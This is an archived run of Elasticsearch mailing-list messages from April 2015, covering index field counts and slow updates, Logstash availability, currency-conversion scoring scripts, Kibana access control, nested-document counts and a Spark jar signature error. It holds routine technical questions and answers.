 in de
Hermitage te Amsterdam
02-03-2015: Buzzcapture breidt webcaredienstverlening uit

met
WhatsApp
01-03-2014: Veel bestaande klanten integreren print

content
in Social Media Dashboard
26-02-2015: Buzzcapture te horen op Radio 1
over
Banendag op Twitter

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAMp7VWR4DTUri2gdkN3sMScpeXEo6isEi_%2BSHbu5vtYJmxh7pw%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: How many fields is too many?

2015-04-16 Thread Mitch Kuchenberg
Hey Nik, you'll have to forgive me if any of my answers don't make sense. 
 I've only been familiar with Elasticsearch for about a week.

1.  Here's a template for my documents: 
 https://gist.github.com/mkuchen/d71de53a80e078242af9
2.  I interact with my search engine through django-haystack 
.  A query may look like 
`SearchQuerySet().filter(document='mitch').order_by('created_at')[:100] -- 
so essentially getting the first 100 documents that have `mitch` in them, 
ordered by the field `created_at`.
3.  Each node has 247.5MB of heap allocated judging by my hosting service's 
dashboard.
4.  The documents/fields take up roughly 30MB on disk.
5.  Using Elasticsearch version 1.4.2 but could very easily upgrade.
6.  I'm hosting with found.no so I don't have access to a command line to 
run that unfortunately.
7.  I haven't found any options in found.no to disable swapping, so I would 
assume they have it off by default?  I could be wrong though.

Thanks for your reply.


On Thursday, April 16, 2015 at 10:06:39 AM UTC-4, Nikolas Everett wrote:
>
>
>
> On Thu, Apr 16, 2015 at 9:40 AM, Mitch Kuchenberg  > wrote:
>
>> I'm currently working on implementing ElasticSearch on a Django-based 
>> REST API.  I hope to be able to search through roughly 5 million documents, 
>> but I've struggled to find an answer to a question I've had from the 
>> beginning:  *how many fields is too many for a single indexed object?*
>>
>> My setup has 512MB of storage and 4GB of memory, 1 shard, and 2 nodes.
>>
>> I want to be able to sort/filter on about 30 different fields for that 
>> single model, but only search on 5-6.  Is 30 fields too many?
>>
>>
> We run with about 20 fields and have no trouble:
> https://en.wikipedia.org/wiki/Field_%28mathematics%29?action=cirrusDump
>
> We have lots more data and lots more machine than you do but I don't see 
> why it wouldn't scale down.
>  
>
>> I have a dev environment set up with roughly 30,000 documents and the 
>> same number of fields, and updates and queries are taking significantly 
>> longer than I had hoped.  Updating a single document is taking between 4-5 
>> seconds, and searching for a 5-character long string is taking 3-4 seconds.
>>
>
>
>  Something is up, yeah. Its hard to figure out what might be up from 
> reading this though. Some questions that are normal to ask here:
> 1. Can you post an example document (like as a gist or pastebin or 
> whatever)?
> 2. Can you post an example query?
> 3. How much heap are you giving Elasticsearch?
> 4. How much disk is the 30,000 documents taking up 
> (/var/lib/elasticsearch) ?
> 5. What version are you using?
> 6. Do you see IO during the query (iostat -dmx 3 10) ?
> 7. Swapping?
>
> Nik
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/2bbda55e-c8f3-4f7f-bdad-875ee7bfe575%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: How many fields is too many?

2015-04-16 Thread Nikolas Everett
On Thu, Apr 16, 2015 at 10:21 AM, joergpra...@gmail.com <
joergpra...@gmail.com> wrote:

> The time required for update depends on the peculiarities of the update
> operations, the massive scripting overhead, the refresh operation, and the
> segment merge activities that are related.
>
> The number of fields does not matter.
>
> My application has 5000 fields. I avoid updates at all costs. A new
> document is faster.
>
>
We can't do that in our application and so have to eat the load for
updates. As far as I can see the biggest cost is in segment merge and the
overhead of tombstoned entries before they are merged out. Still, with
30,000 documents none of that is likely to be a big deal.

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAPmjWd37ZXoH_xMtpJSFxtkpJ2zSSAq-FYqLDXNZ3Hv6%2BLFHRg%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: How many fields is too many?

2015-04-16 Thread joergpra...@gmail.com
The time required for update depends on the peculiarities of the update
operations, the massive scripting overhead, the refresh operation, and the
segment merge activities that are related.

The number of fields does not matter.

My application has 5000 fields. I avoid updates at all costs. A new
document is faster.

Jörg

On Thu, Apr 16, 2015 at 3:40 PM, Mitch Kuchenberg 
wrote:

> I'm currently working on implementing ElasticSearch on a Django-based REST
> API.  I hope to be able to search through roughly 5 million documents, but
> I've struggled to find an answer to a question I've had from the beginning:
>  *how many fields is too many for a single indexed object?*
>
> My setup has 512MB of storage and 4GB of memory, 1 shard, and 2 nodes.
>
> I want to be able to sort/filter on about 30 different fields for that
> single model, but only search on 5-6.  Is 30 fields too many?
>
> I have a dev environment set up with roughly 30,000 documents and the same
> number of fields, and updates and queries are taking significantly longer
> than I had hoped.  Updating a single document is taking between 4-5
> seconds, and searching for a 5-character long string is taking 3-4 seconds.
>
> Is there hope that this is a configuration problem, or should I reconsider
> how many fields I'm using?  Thanks in advance.
>
> --
> You received this message because you are subscribed to the Google Groups
> "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/elasticsearch/bf34715f-aca3-4aa8-a1d5-81e97b87d119%40googlegroups.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAKdsXoH%3DPF6HewBiMGmsKN%3DCA_SH6GNqSvaFhH_uZAHOjMhLbw%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: How to achieve ELK High availability

2015-04-16 Thread Magnus Bäck
On Thursday, April 16, 2015 at 13:35 CEST,
 vikas gopal  wrote:

> Thank you for the suggestion , yes I am aware and I am done with ES
> clustering . Now I want the same for LS . Since LS does not have in
> build feature like ES has , so what would be the best way for LS to
> make i highly available in windows environment?

Let's continue that discussion in the logstash-users thread.

https://groups.google.com/d/topic/logstash-users/tQHqrXPSV_w/discussion

-- 
Magnus Bäck| Software Engineer, Development Tools
magnus.b...@sonymobile.com | Sony Mobile Communications

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/20150416140755.GA23695%40seldlx20533.corpusers.net.
For more options, visit https://groups.google.com/d/optout.


Re: How many fields is too many?

2015-04-16 Thread Nikolas Everett
On Thu, Apr 16, 2015 at 9:40 AM, Mitch Kuchenberg 
wrote:

> I'm currently working on implementing ElasticSearch on a Django-based REST
> API.  I hope to be able to search through roughly 5 million documents, but
> I've struggled to find an answer to a question I've had from the beginning:
>  *how many fields is too many for a single indexed object?*
>
> My setup has 512MB of storage and 4GB of memory, 1 shard, and 2 nodes.
>
> I want to be able to sort/filter on about 30 different fields for that
> single model, but only search on 5-6.  Is 30 fields too many?
>
>
We run with about 20 fields and have no trouble:
https://en.wikipedia.org/wiki/Field_%28mathematics%29?action=cirrusDump

We have lots more data and lots more machine than you do but I don't see
why it wouldn't scale down.


> I have a dev environment set up with roughly 30,000 documents and the same
> number of fields, and updates and queries are taking significantly longer
> than I had hoped.  Updating a single document is taking between 4-5
> seconds, and searching for a 5-character long string is taking 3-4 seconds.
>


 Something is up, yeah. Its hard to figure out what might be up from
reading this though. Some questions that are normal to ask here:
1. Can you post an example document (like as a gist or pastebin or
whatever)?
2. Can you post an example query?
3. How much heap are you giving Elasticsearch?
4. How much disk is the 30,000 documents taking up (/var/lib/elasticsearch)
?
5. What version are you using?
6. Do you see IO during the query (iostat -dmx 3 10) ?
7. Swapping?

Nik

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAPmjWd1XNLjkPPJ%3DuhmX3_B2j2xrr4z1m84zWrppvFQ-%3DNNKFQ%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: Changing the published port

2015-04-16 Thread Vinicius Carvalho
Doh! Thanks a lot for this :)

On Monday, April 13, 2015 at 7:52:11 PM UTC-4, Jay Modi wrote:
>
> Have you tried transport.publish_port [1]? 
>
> [1]
> http://www.elastic.co/guide/en/elasticsearch/reference/1.5/modules-transport.html#_tcp_transport

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/7888d149-d53a-48b7-8fff-9bcb25603f5d%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


How many fields is too many?

2015-04-16 Thread Mitch Kuchenberg
I'm currently working on implementing ElasticSearch on a Django-based REST 
API.  I hope to be able to search through roughly 5 million documents, but 
I've struggled to find an answer to a question I've had from the beginning: 
 *how many fields is too many for a single indexed object?*

My setup has 512MB of storage and 4GB of memory, 1 shard, and 2 nodes.

I want to be able to sort/filter on about 30 different fields for that 
single model, but only search on 5-6.  Is 30 fields too many?

I have a dev environment set up with roughly 30,000 documents and the same 
number of fields, and updates and queries are taking significantly longer 
than I had hoped.  Updating a single document is taking between 4-5 
seconds, and searching for a 5-character long string is taking 3-4 seconds.

Is there hope that this is a configuration problem, or should I reconsider 
how many fields I'm using?  Thanks in advance.

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/bf34715f-aca3-4aa8-a1d5-81e97b87d119%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


elasticsearch start issue

2015-04-16 Thread Sigehere
Hi Friends,
I was using elasticsearch.0.90.8. Now I have downloaded 
elasticsearch.1.5.1.deb. But when i was trying to start elastic i got 
following error:
$ sudo service elasticsearch start
 * Starting Elasticsearch Server
   ...fail!
   ...fail!
   ...fail!
   ...fail!
   ...fail!
   ...fail!

I didn't got any log information in /var/log/elasticsearch.
Can any buddy tell me. Where i was going wrong?

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/911c2e0f-53b7-435f-b081-4812635138c9%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Access to specific kibana dashboards

2015-04-16 Thread Rubaiyat Islam Sadat
Hi all,

As a completely newbie here, I am going to ask you a question which you 
might find find naive (or stupid!). I have a scenario where I would like to 
restrict access from specific locations (say, IP addresses) to access 
*'specific'* dashboards in Kibana. As far as I know that Apache level 
access is based on relative static path/url, it won’t know detail how 
kibana works. Is there any way/suggestion to control which users can load 
which dashboards? Or may be I'm wrong, there is a way to do that. Your 
suggestions would be really helpful. I am using Kibana 3 and I am not in a 
position to use Shield.

Cheers!
Ruby

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/cc652358-4d42-4263-9238-a76f42de5dad%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: How to achieve ELK High availability

2015-04-16 Thread vikas gopal
Thank you for the suggestion , yes I am aware and I am done with ES 
clustering . Now I want the same for LS . Since LS does not have in build 
feature like ES has , so what would be the best way for LS to make i highly 
available in windows environment? 

On Wednesday, April 1, 2015 at 12:03:24 PM UTC+5:30, Magnus Bäck wrote:
>
> On Wednesday, April 01, 2015 at 05:06 CEST, 
>  vikas gopal > wrote: 
>
> > Need your valuable suggestions here . I have ELK on a single windows 
> > instance and I want to make it high available . I mean if one machine 
> > goes down second will take up the whole load, like clustering. Can you 
> > suggest how I can achieve this. 
>
> Since you're saying "like clustering", are you aware that Elasticsearch 
> supports clustering natively? To improve the availability, run two or 
> (preferably) at least three Elasticsearch nodes and configure replicas 
> for your shards. If one node goes down all data will still be available. 
>
>
> http://www.elastic.co/guide/en/elasticsearch/guide/current/distributed-cluster.html
>  
>
> -- 
> Magnus Bäck| Software Engineer, Development Tools 
> magnu...@sonymobile.com  | Sony Mobile Communications 
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/21dcc0e7-16a4-46c9-a8eb-7b6c05ec0b1e%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


How to configure max file descriptors on windows OS?

2015-04-16 Thread Xudong You
Anyone knows how to change the max_file_descriptors on windows?
I built ES cluster on Windows and got following process information:

"max_file_descriptors" : -1,
"open_file_descriptors" : -1,

What does “-1 mean?
Is it possible to change the max file descriptors on windows platform?

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/aa22c565-80f5-4228-8f03-15d1b1e3f150%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Please suggest.

2015-04-16 Thread info


On Wednesday, April 15, 2015 at 8:00:12 AM UTC+2, vikas gopal wrote:
>
> thank you for your quick response. I am totally new to this, any document 
> or website to understand nginx or any guide to configure nginx as a reverse 
> proxy on windows server 2012.
>
>
>
Have a look here http://nginx-win.ecsds.eu/ , plenty of docs and examples, 
all Windows orientated.
 

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/032b91c5-567c-4923-993a-47d0a1d477b6%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Assistance with Choosing the Correct Query Structure

2015-04-16 Thread David Dyball
Sorry, I missed out "boost_mode": "replace" in my function_score example 
above. I want the score to be the exact converted
currency, so I can make use of it in code.

On Thursday, April 16, 2015 at 10:44:35 AM UTC+1, David Dyball wrote:
>
> Hi All,
>
> TL;DR: Doing dynamic currency conversion via function_score works great 
> for scenarios where I want to sort by prices,
> but I want the same functionality in queries that will be sorted by 
> relevance score when using terms while still retaining
> a dynamically calulated field for converted price.
>
> Long version:
>
> I'm looking to deploy Elasticsearch as a primary search engine for a 
> catalog of products. Each product has a 
> provider_price and provider_currency field. The "provider_price" is 
> always in the currency specified by 
> "provider_currency". When a user gets their search results they want to 
> display it in their local currency. To 
> do this I've come up with two different queries depending on how the 
> results will be sorted for the end user.
>
> 1) If the user requests a price-based sorting (asc/desc) then I'm using a 
> function_score query like so:
>
> {
>   "query": {
> "function_score": {
>   "functions": [
> "script_score": {
>   "script": "( rates[_source.provider_currency] * 
> _source.provider_price )",
>   "params": {
> "rates": {
>   "USD": 1,
>   "AUD": 0.75,
>   ...
>   ...
>   ...
> }
>   }
> }
>   ],
>   "query": {
> "filtered": {
>   
> }
>   }
> },
> "sort": {
>   {
> "_score": "asc/desc"
>   }
> }
> }
>
> 2) When sorting by terms or other fields in the document I still need to 
> calculate the converted price, so I'm using script_fields like so:
>
> {
>   "fields": [
> "_source"
>   ],
>   "query": {
> ..
>   },
>   "script_fields": {
> "user_price": {
>   "script": "( rates[_source.provider_currency] * 
> _source.provider_price )",
>   "params": {
> "rates": {
>   "USD": 1,
>   "AUD": 0.75,
>   ...
>   ...
>   ...
> }
>   }
> }
>   },
>   "sort": [
> {
>   "_score": "desc"
> }
>   ]
> }
>
>
> A few queries with the above:
>
>   1) Does this generally seem like a sane implementation?
>
>   2) These both work perfectly for doing on-the-fly conversions of 
> currency and returing it with the documents, 
>   but at the moment my app-side code has to make the distinction 
> between price-sorting queries and term
>   queries and issue the correct one, as well extract the converted 
> price from the correct field depending
>   (_score or _source.user_price respectively).
>
>   Is there any way to simplify this?
>
>   e.g. When doing a function_score query, copy the _score to another 
> generated field called "user_score". 
>   That way the code only needs to know about one field ("user_score") 
> for both queries.
>
> Cheers for any assistance the community can provide.
>
> David.
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/4fcdbf81-a081-4eb9-a292-35a506ee9c65%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Assistance with Choosing the Correct Query Structure

2015-04-16 Thread David Dyball
Hi All,

TL;DR: Doing dynamic currency conversion via function_score works great for 
scenarios where I want to sort by prices,
but I want the same functionality in queries that will be sorted by 
relevance score when using terms while still retaining
a dynamically calulated field for converted price.

Long version:

I'm looking to deploy Elasticsearch as a primary search engine for a 
catalog of products. Each product has a 
provider_price and provider_currency field. The "provider_price" is always 
in the currency specified by 
"provider_currency". When a user gets their search results they want to 
display it in their local currency. To 
do this I've come up with two different queries depending on how the 
results will be sorted for the end user.

1) If the user requests a price-based sorting (asc/desc) then I'm using a 
function_score query like so:

{
  "query": {
"function_score": {
  "functions": [
"script_score": {
  "script": "( rates[_source.provider_currency] * 
_source.provider_price )",
  "params": {
"rates": {
  "USD": 1,
  "AUD": 0.75,
  ...
  ...
  ...
}
  }
}
  ],
  "query": {
"filtered": {
  
}
  }
},
"sort": {
  {
"_score": "asc/desc"
  }
}
}

2) When sorting by terms or other fields in the document I still need to 
calculate the converted price, so I'm using script_fields like so:

{
  "fields": [
"_source"
  ],
  "query": {
..
  },
  "script_fields": {
"user_price": {
  "script": "( rates[_source.provider_currency] * 
_source.provider_price )",
  "params": {
"rates": {
  "USD": 1,
  "AUD": 0.75,
  ...
  ...
  ...
}
  }
}
  },
  "sort": [
{
  "_score": "desc"
}
  ]
}


A few queries with the above:

  1) Does this generally seem like a sane implementation?

  2) These both work perfectly for doing on-the-fly conversions of currency 
and returing it with the documents, 
  but at the moment my app-side code has to make the distinction 
between price-sorting queries and term
  queries and issue the correct one, as well extract the converted 
price from the correct field depending
  (_score or _source.user_price respectively).

  Is there any way to simplify this?

  e.g. When doing a function_score query, copy the _score to another 
generated field called "user_score". 
  That way the code only needs to know about one field ("user_score") 
for both queries.

Cheers for any assistance the community can provide.

David.

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/aef94d97-dad6-43c4-866f-af749101ce6a%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Head shows incorrect docs count if nested type field is defined in mapping

2015-04-16 Thread Xudong You
I was confused by the docs count value displaying in head plugin if there 
is nest type field define in mapping

For example, I created a new index with following mapping:
{
"mappings" : {
"doc" : {
"properties" : {
"QueryClicks" : {
"type" : "nested",
"properties" : {
"Count" : {
"type" : "long"
},
"Term" : {
"type" : "string"
}
}
},
"Title" : {
"type" : "string"
}
}
}
}
}

And then insert ONE doc:
{
  "QueryClicks":[{"Term":"term1","Count":10},{"Term":"term2","Count":10}],
  "Title":"test title"
}

Then refresh Head, the docs shown on Head is 3:
size: 3.57ki (6.97ki)
docs: 3 (3)

Why?

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/f3148390-9174-4521-b97a-94f6cbfe4307%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Deleted index directories still can data logs through kibana

2015-04-16 Thread Ch Ravikishore
Hi,
I am new to linux machine , I have python 2.4.3 installed in my machine 
where pip installation is throwing error. Could you help to install curator 
and configure that.
Thanks

On Thursday, April 16, 2015 at 1:01:30 PM UTC+5:30, Mark Walkom wrote:
>
> Elasticsearch Curator (https://github.com/elasticsearch/curator) is a 
> better way to manage deletion of indices.
>
> Deleting them off the file system is messy.
>
> On 16 April 2015 at 16:50, Ch Ravikishore  > wrote:
>
>> Hi,
>>
>> I deleted the index directories from */data/Cluster/nodes/0/indices
>> But still I am able to access logs from kibana dashboard. I don't know 
>> where I went wrong.Please suggest me to delete 7 day old indices.
>> index directory name format :
>> logstash-2015.04.02
>>
>> Thanks in advance,
>> Regards,
>> Ravi
>>
>> -- 
>> You received this message because you are subscribed to the Google Groups 
>> "elasticsearch" group.
>> To unsubscribe from this group and stop receiving emails from it, send an 
>> email to elasticsearc...@googlegroups.com .
>> To view this discussion on the web visit 
>> https://groups.google.com/d/msgid/elasticsearch/d940ccb4-c295-43c5-8901-f1dac62ec044%40googlegroups.com
>>  
>> 
>> .
>> For more options, visit https://groups.google.com/d/optout.
>>
>
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/6a4ec611-e386-4f6a-85d0-43c563c796f0%40googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Deleted index directories still can data logs through kibana

2015-04-16 Thread Mark Walkom
Elasticsearch Curator (https://github.com/elasticsearch/curator) is a
better way to manage deletion of indices.

Deleting them off the file system is messy.

On 16 April 2015 at 16:50, Ch Ravikishore 
wrote:

> Hi,
>
> I deleted the index directories from */data/Cluster/nodes/0/indices
> But still I am able to access logs from kibana dashboard. I don't know
> where I went wrong.Please suggest me to delete 7 day old indices.
> index directory name format :
> logstash-2015.04.02
>
> Thanks in advance,
> Regards,
> Ravi
>
> --
> You received this message because you are subscribed to the Google Groups
> "elasticsearch" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to elasticsearch+unsubscr...@googlegroups.com.
> To view this discussion on the web visit
> https://groups.google.com/d/msgid/elasticsearch/d940ccb4-c295-43c5-8901-f1dac62ec044%40googlegroups.com
> 
> .
> For more options, visit https://groups.google.com/d/optout.
>

-- 
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/CAEYi1X8K89QMbJnSkpxFLmS_VN50%2BYi5f5kvew1B%3DnieZj1-cQ%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.


Re: about elasticsearch-hadoop error

2015-04-16 Thread Costin Leau
Based on your cryptic message I would guess the issue is likely that the jar you are building is incorrect as it's 
manifest is invalid. Spark most likely is signed and thus extra content breaks this.


See 
http://www.elastic.co/guide/en/elasticsearch/hadoop/master/troubleshooting.html#help

On 4/16/15 9:11 AM, guoyiqi...@gmail.com wrote:

*Hello*
*
*
*when add elasticsearch-hadoop jar *
*
*
*
*
*
*
*
*
*this is a error*

Spark assembly has been built with Hive, including Datanucleus jars on classpath
Exception in thread "main" java.lang.SecurityException: Invalid signature file 
digest for Manifest main attributes
at 
sun.security.util.SignatureFileVerifier.processImpl(SignatureFileVerifier.java:287)
at 
sun.security.util.SignatureFileVerifier.process(SignatureFileVerifier.java:240)
at java.util.jar.JarVerifier.processEntry(JarVerifier.java:274)
at java.util.jar.JarVerifier.update(JarVerifier.java:228)
at java.util.jar.JarFile.initializeVerifier(JarFile.java:348)
at java.util.jar.JarFile.getInputStream(JarFile.java:415)
at sun.misc.JarIndex.getJarIndex(JarIndex.java:137)
at sun.misc.URLClassPath$JarLoader$1.run(URLClassPath.java:674)
at sun.misc.URLClassPath$JarLoader$1.run(URLClassPath.java:666)
at java.security.AccessController.doPrivileged(Native Method)
at sun.misc.URLClassPath$JarLoader.ensureOpen(URLClassPath.java:665)
at sun.misc.URLClassPath$JarLoader.(URLClassPath.java:638)
at sun.misc.URLClassPath$3.run(URLClassPath.java:366)
at sun.misc.URLClassPath$3.run(URLClassPath.java:356)
at java.security.AccessController.doPrivileged(Native Method)
at sun.misc.URLClassPath.getLoader(URLClassPath.java:355)
at sun.misc.URLClassPath.getLoader(URLClassPath.java:332)
at sun.misc.URLClassPath.getResource(URLClassPath.java:198)
at java.net.URLClassLoader$1.run(URLClassLoader.java:358)
at java.net.URLClassLoader$1.run(URLClassLoader.java:355)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:354)
at java.lang.ClassLoader.loadClass(ClassLoader.java:425)
at java.lang.ClassLoader.loadClass(ClassLoader.java:358)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:270)
at 
org.apache.spark.deploy.SparkSubmit$.org$apache$spark$deploy$SparkSubmit$$runMain(SparkSubmit.scala:538)
at org.apache.spark.deploy.SparkSubmit$.doRunMain$1(SparkSubmit.scala:166)
at org.apache.spark.deploy.SparkSubmit$.submit(SparkSubmit.scala:189)
at org.apache.spark.deploy.SparkSubmit$.main(SparkSubmit.scala:110)
at org.apache.spark.deploy.SparkSubmit.main(SparkSubmit.scala)



thank you
--
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email to 
elasticsearch+unsubscr...@googlegroups.com .
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/b12f1628-d7cf-4305-8fdd-5b359cd0a663%40googlegroups.com 
.

For more options, visit https://groups.google.com/d/optout.



--
Costin

--
You received this message because you are subscribed to the Google Groups 
"elasticsearch" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to elasticsearch+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/elasticsearch/552F5EAB.4030506%40gmail.com.
For more options, visit https://groups.google.com/d/optout.